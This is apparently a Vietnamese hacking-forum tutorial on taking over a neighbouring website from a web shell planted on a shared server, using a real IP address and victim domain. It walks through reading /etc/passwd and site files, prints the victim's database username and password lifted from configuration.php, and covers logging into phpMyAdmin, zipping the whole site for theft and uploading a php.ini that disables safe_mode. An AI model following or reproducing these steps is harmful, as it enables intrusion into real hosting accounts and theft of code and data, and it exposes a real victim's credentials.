TUT Local kèm video

Trích dẫn

sau đây mình xin làm tut hướng dẫn các bạn loacl 1 website cơ bản khi có shell
còn up shell sao mình sẽ làm tut sau
lần này mình có 1 con shell trên server 210.245.85.253
chọn đại 1 victim code củng tạm
mình thử site này nha
tiếp theo bạn vào shell chạy lệnh sau:
cat /etc/passwd
nhầm
vnetc
mình nghĩ có lẽ user này
vì con shell này đã vọc từ trước
để xem user chính xác ko các bạn chạy link sau:
http://210.245.85.253/~vnetc
chính xác
bây giờ chạy tiếp lệnh sau
dir /home/vnetc/domains/tinbds.net/public_html/
để xem files trên host
nếu như bạn chạy lệnh trên không được thì chạy lệnh dưới đây:
cat /home/vnetc/domains/tinbds.net/public_html/index.php
sau đó tự tìm files congfig.php



CHANGELOG.php components index2.php plugins
COPYRIGHT.php configuration.php jaextmanager_data robots.txt
CREDITS.php configuration.php-dist language t3-assets
INSTALL.php ftu libraries templates
LICENSE.php google3661c0434125aff0.html logs tmp
LICENSES.php htaccess.txt mail xmlrpc
SUPPORT images media
administrator includes modules
cache index.php pgftu





đây là toàn bộ files và thư mục ngoài cùng
mình xem có files config.php ko nhé
configuration.php đây rùi
views thui
đây là toàn bộ thông tin của nó
var $password = '1qazxsw23edc';
var $user = 'vnetc_TinBDS';
var $db = 'vnetc_TinBDS';
thôn tin database

đăng nhập vào phpmyadmin nào
hi mình có lưu log hùi lúc rùi

xong bây giờ chỉ cần up shell
or df
mình xin chỉ thêm
để zip code bạn có thể làm như sau
zip -r -9 tênfiles.zip /path/
ví dụ:
zip -r -9 codebatdongsang.zip /home/vnetc/domains/tinbds.net/public_html/
và run
nó sẽ tự động zip code về hosting ngang hàng với shell của bạn
thế là ok
nếu safe_mode là on
thì bạn up lên 1 files php.ini với nội dung như sau
safe_mode = OFF
sau đó load vào shell
END TUT 

by Master_KKD NBT